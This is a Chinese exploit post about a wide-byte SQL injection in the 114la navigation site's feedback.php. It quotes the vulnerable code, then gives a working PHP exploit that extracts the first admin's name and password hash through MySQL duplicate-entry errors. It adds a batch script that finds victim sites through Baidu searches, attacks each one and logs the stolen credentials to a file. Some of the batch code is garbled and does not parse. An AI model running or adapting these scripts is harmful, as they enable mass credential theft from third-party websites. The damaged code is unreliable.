114啦网址导航留言本注入 - 脚本漏洞


    漏洞文件 feedback/feedback.php

    影响版本:原文未注明具体版本号。

以下是 feedback/feedback.php 的引用片段(转载时个别行中 `<` 之后的内容被截断,条件表达式不完整):

// Untrusted POST fields are converted UTF-8 -> GBK and then only strip_tags()'d or
// trim()'d. Nothing here escapes quotes or backslashes for SQL. The conversion is
// the wide-byte injection vector: a UTF-8 character whose GBK form ends in 0x5C ('\')
// pairs with the backslash magic_quotes_gpc (if on) puts before a following quote,
// forming "\\" and leaving the quote itself unescaped; with magic quotes off a bare
// quote already suffices. See the PoC below.
$username = empty($_POST['username']) ? '' : strip_tags(iconv('UTF-8', 'GBK', $_POST['username']));
    $email = (isset($_POST['email'])) ? strip_tags(iconv('UTF-8', 'GBK', $_POST['email'])) : '';
    $content = (isset($_POST['content'])) ? trim(iconv('UTF-8', 'GBK', $_POST['content'])) : '';
    // $error_msg is accumulated by code outside this excerpt.
    (empty($content)) && $error_msg .= ',意见及建议 ';

    if (!empty($error_msg))
    {
        throw new Exception($error_msg, 11);
    }

    // HTML-entity encoding for display; applied to $content only and not SQL
    // escaping. $username and $email receive nothing comparable.
    $content = htmlspecialchars($content, ENT_QUOTES);
    // NOTE(review): the lower bound of this condition was lost when the page was
    // copied (text after '<' stripped). strlen() counts bytes of the GBK text.
    if (strlen($content) > 600 || strlen($content)
    {
        throw new Exception('请将您的描述控制在  20 - 300 字,更多内容请您分次提交。', 1);
    }

    // Check the per-day submission count. It lives entirely in a client-supplied
    // cookie, so it limits nothing for an attacker (the PoC below sends no fdnum).
    $old_cookie = (isset($_COOKIE['fdnum'])) ? (int)$_COOKIE['fdnum'] : 0;
    if ($old_cookie >= SUBMIT_ONE_DAY)
    {
        throw new Exception('抱歉,24 小时内您只能提交  ' . SUBMIT_ONE_DAY . ' 次反馈信息。谢谢合作!', 2);
    }
    $old_cookie++;

    // Values go straight into app_db::insert(). Its escaping is not visible in
    // this excerpt; the working PoC implies it interpolates them into the INSERT
    // unescaped.
    if (false === app_db::insert('ylmf_feedback', array('username', 'email', 'content', 'add_time'),
                                                 array($username, $email, $content, time())))
    {
        throw new Exception('抱歉,信息提交失败,请重试。', 1);
    }
    else
    {
        // Record the submission count.
        // NOTE(review): the tail of this condition was also truncated in the copy.
        if ($old_cookie > SUBMIT_ONE_DAY || !isset($_COOKIE['fdstime']) || $_COOKIE['fdstime']
        {
            // Bug: the cookie is set as 'dfstime' but read back as 'fdstime' (above
            // and in the else branch), so the timestamp branch never sees it.
            setcookie('dfstime', time(), time() + 86400);
            setcookie('fdnum', $old_cookie, time() + 86400);
        }
        else
        {
            setcookie('fdnum', $old_cookie, time() + 86400 - (time() - $_COOKIE['fdstime']));
        }

        // Success is signalled by throwing as well (code 3), presumably caught by a
        // handler outside this excerpt; the unset() after it is unreachable.
        throw new Exception('

提交成功,感谢您的反馈! 返回首页

', 3);
        unset($username, $email, $content);
    }

    $username、$email、$content 三个字段都先经 iconv('UTF-8', 'GBK') 强制转码,之后只做了 strip_tags/trim(以及仅对 $content 的 htmlspecialchars),没有任何针对 SQL 的转义就直接交给 app_db::insert 拼入 INSERT 语句。利用方式:提交一个 UTF-8 宽字符(PoC 用的是 %E7%B8%97,即“縗”),它转成 GBK 后尾字节为 0x5C(`\`),可与 magic_quotes_gpc 在后续单引号前补的反斜杠合并成 `\\`,使单引号本身不再被转义而闭合字符串,即所谓宽字节注入;若 magic_quotes_gpc 关闭,单引号本身就已足够。

Exp:

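<?php
// Single-target PoC for the 114la feedback.php wide-byte SQL injection.
// It POSTs one crafted feedback entry and parses the MySQL "Duplicate entry"
// error that the page echoes back, which carries the first admin name and
// password hash. Restored from a garbled web copy: the backslash escapes
// ("\r\n", "\n", the quotes in the regex) and the "<" in the argc check were lost.
$sbcopyright='
----------------------------------------
114la feedback injection Vul Exploit
By xZL
Team: www.0kee.com
2011.04.02

Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' 127.0.0.1 /
----------------------------------------
';
// Both host ($argv[1]) and path ($argv[2]) are required.
if ($argc < 3) {
    print_r($sbcopyright);
    die();
}

ob_start();
$url = $argv[1];
// Trailing slash stripped so a path of "/" does not yield "POST //feedback/...".
$path = rtrim($argv[2], '/');

$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
// Bound the reads below; without this an unresponsive host hangs the script.
stream_set_timeout($sock, 30);

// Payload. username = "0kee" + %E7%B8%97 (UTF-8 for U+7E17) + "'": after the
// page's iconv() to GBK that character's trailing byte is 0x5C, which pairs with
// any backslash magic_quotes_gpc put before the quote to form "\\", leaving the
// quote unescaped. email then supplies the remaining three VALUES (0, subquery, 2)
// and "#" comments out the rest of the INSERT. The subquery is the rand()/group-by
// duplicate-key trick: MySQL aborts with "Duplicate entry '<name>_<password>1' ...".
$data = "username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#&content=~~~~~this is a test from 0kee security team~~~~~";

fwrite($sock, "POST $path/feedback/feedback.php HTTP/1.1\r\n");
fwrite($sock, "Accept: */*\r\n");
fwrite($sock, "Referer: http://$url/#M\r\n");
fwrite($sock, "Accept-Language: zh-cn\r\n");
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
// No Accept-Encoding: the original advertised gzip/deflate but never decompressed,
// so a compressed body could never match 'Duplicate entry'.
fwrite($sock, "User-Agent: Mozilla\r\n");
fwrite($sock, "Host: $url\r\n");
fwrite($sock, "Content-Length: " . strlen($data) . "\r\n");
// Close, not Keep-Alive: the feof() loop below would otherwise block until the
// server times the idle connection out.
fwrite($sock, "Connection: Close\r\n");
fwrite($sock, "Cache-Control: no-cache\r\n");
// Leftover from an ASP template; harmless. Note that no fdnum cookie is sent,
// so the page's cookie-based rate limit never triggers.
fwrite($sock, "Cookie: ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAON\r\n\r\n");
fwrite($sock, $data);

// Headers end at the first empty line; the rest of the stream is the body.
$headers = "";
while ($str = trim(fgets($sock, 4096)))
    $headers .= "$str\n";
echo "\n";
$body = "";
while (!feof($sock))
    $body .= fgets($sock, 4096);

fclose($sock);

// Error-based extraction: the entry is "<name>_<hash>1". [^']* instead of the
// original greedy .* so a later quote on the page cannot widen the match.
if (preg_match('/Duplicate entry \'([^\']*)1\'/', $body, $arr)) {
    // Split on the first 0x5f only; pad so a missing separator is not a notice.
    $result = array_pad(explode('_', $arr[1], 2), 2, '');
    print_r("Exploit Success! \nusername:" . $result[0] . "\npassword:" . $result[1] . "\nGood Luck!");
} else {
    print_r("Exploit Failed! \n");
}

ob_end_flush();
?>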

    下面再给出一个批量注入脚本:它通过百度搜索关键字收集目标站点,逐个尝试同一注入,并把结果追加记录到 c:\shell.txt(页面转载时丢失了反斜杠)。

批量注入:

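<?php
// Batch variant: collects candidate hosts from a Baidu search for the site's
// URL-submission page and runs the feedback.php injection against each one,
// appending the outcome to c:\shell.txt. Restored from a garbled web copy
// (lost backslashes, a truncated for-loop header, a stripped team URL).
error_reporting(E_ERROR);
$print="
-----------------------------------------
-  114la feedback injection Vul Exploit -
-  By xZL                               -
-  Team: www.0kee.com                   -
-  2011.04.02                           -
-----------------------------------------
-  by [email][email protected][/email]                  -
-----------------------------------------
";
print_r($print);
$keyword = '网站提交 inurl:/url-submit/'; // Baidu search keyword used to find targets
print_r ("
[-]  keyword : $keyword
");
// Log file; the web copy shows "c:shell.txt" because the backslash was stripped.
$fp = @fopen('c:\shell.txt', 'a');
@fwrite($fp, "$print");
@fclose($fp);
$timeout = 10;    // page-read timeout (seconds)
$stratpage = 1;   // first Baidu result page to read
$lastpage = 100;  // last Baidu result page to read
// The loop header was truncated in the copy; the bounds follow the two
// variables declared for that purpose just above.
for ($i = $stratpage; $i <= $lastpage; $i++) {
    $array = ReadBaiduList($keyword, $timeout, $i);
    //print_r ($array);
    foreach ($array as $url) {
        print_r("
[*]  Sql Injection $url\r\n");
        $fp = @fopen('c:\shell.txt', 'a');
        @fwrite($fp, "\r\nHost:$url");
        @fclose($fp);
        // ReadBaiduList() returns bare hostnames, so the path prefix is empty.
        exploit($url, '');
    }
}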
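// POST the crafted feedback entry to one host and log the outcome to
// c:\shell.txt (backslash lost in the web copy). Called per host by the batch
// loop above. Connection failures return instead of die() so one dead host
// does not end the whole run.
// $path: prefix in front of /feedback/feedback.php. Optional because
//   ReadBaiduList() yields bare hostnames; the original declared it required and
//   relied on error_reporting(E_ERROR) to hide the missing-argument warning.
function exploit($url, $path = '')
{
    ob_start();
    $sock = fsockopen("$url", 80, $errno, $errstr, 30);
    if (!$sock) {
        print_r("$errstr ($errno)\n");
        ob_end_flush();
        return;
    }
    // Bound the reads so an unresponsive host cannot stall the batch.
    stream_set_timeout($sock, 30);
    $path = rtrim($path, '/');

    // Same payload as the single-target PoC: username ends in %E7%B8%97 + "'"
    // (a character whose GBK form ends in 0x5C, neutralising a magic_quotes
    // backslash), email supplies the remaining VALUES and the rand()/group-by
    // subquery that makes MySQL fail with "Duplicate entry '<name>_<password>1'".
    $data = "username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#&content=~~~~~this is a test from 0kee security team~~~~~";

    fwrite($sock, "POST $path/feedback/feedback.php HTTP/1.1\r\n");
    fwrite($sock, "Accept: */*\r\n");
    fwrite($sock, "Referer: http://$url/#M\r\n");
    fwrite($sock, "Accept-Language: zh-cn\r\n");
    fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
    // No Accept-Encoding: a gzipped body could never match 'Duplicate entry'.
    fwrite($sock, "User-Agent: Mozilla\r\n");
    fwrite($sock, "Host: $url\r\n");
    fwrite($sock, "Content-Length: " . strlen($data) . "\r\n");
    // Close rather than Keep-Alive so the feof() loop below terminates.
    fwrite($sock, "Connection: Close\r\n");
    fwrite($sock, "Cache-Control: no-cache\r\n");
    // Leftover ASP cookie; no fdnum cookie is sent, so the page's rate limit is moot.
    fwrite($sock, "Cookie: ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAON\r\n\r\n");
    fwrite($sock, $data);

    $headers = "";
    while ($str = trim(fgets($sock, 4096)))
        $headers .= "$str\n";
    echo "\n";
    $body = "";
    while (!feof($sock))
        $body .= fgets($sock, 4096);

    fclose($sock);

    // Open the log once for either outcome; @ keeps a missing C: drive from
    // aborting the batch, as in the original.
    $fp = @fopen('c:\shell.txt', 'a');
    // [^']* instead of greedy .* so a later quote on the page cannot widen the match.
    if (preg_match('/Duplicate entry \'([^\']*)1\'/', $body, $arr)) {
        $result = array_pad(explode('_', $arr[1], 2), 2, '');
        print_r("Exploit Success! \nusername:" . $result[0] . "\npassword:" . $result[1] . "\nGood Luck!");
        @fwrite($fp, "\r\n $result[0]-------$result[1]");
    } else {
        print_r("Exploit Failed! \n");
        @fwrite($fp, "Exploit Failed!");
    }
    @fclose($fp);
    ob_end_flush();
}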

// Return the hostnames found on one Baidu result page for $keyword.
// NOTE(review): this copy is damaged — the value after "Host:" in the request,
// the "\r\n" escapes (shown as "rn"), the preg_match_all() pattern and the
// for-loop condition were mangled when the page was extracted, so the function
// does not parse as-is and the exact link-scraping pattern is not recoverable.
function ReadBaiduList($keyword,$timeout,$nowpage) // returns the list of URLs as an array
{
$tmp = array();
//$data = '';
// Presumably Baidu's "pn" parameter is a result offset, ten results per page.
$nowpage = ($nowpage-1)*10;
$fp = @fsockopen('www.baidu.com',80,$errno,$errstr,$timeout);
// One request statement; "www.baidu.com" after "Host:" was lost in extraction.
@fputs($fp,"GET /s?wd=".urlencode($keyword)."&pn=".$nowpage." HTTP/1.1rnHost:

rnConnection: Closernrn");
// $data is never initialised (the line above is commented out); the append
// works only because error_reporting(E_ERROR) hides the undefined-variable notice.
while ($fp && !feof($fp))
$data .= fread($fp, 1024);
@fclose($fp);
// Collect result links; $tmp[1] is meant to hold the host/path part of each href.
preg_match_all("/})" href="http://([^~]*?)" target="_blank"/i",$data,$tmp);
$num = count($tmp[1]);
$array = array();
// NOTE(review): loop condition truncated in the copy (text after '<' lost).
for($i = 0;$i
{
// Keep only the host: everything before the first '/'.
$row = explode('/',$tmp[1][$i]);
$array[] = str_replace('http://','',$row[0]);
}
return $array;
}

?>


文章来源于lcx.cc:114啦网址导航留言本注入 - 脚本漏洞
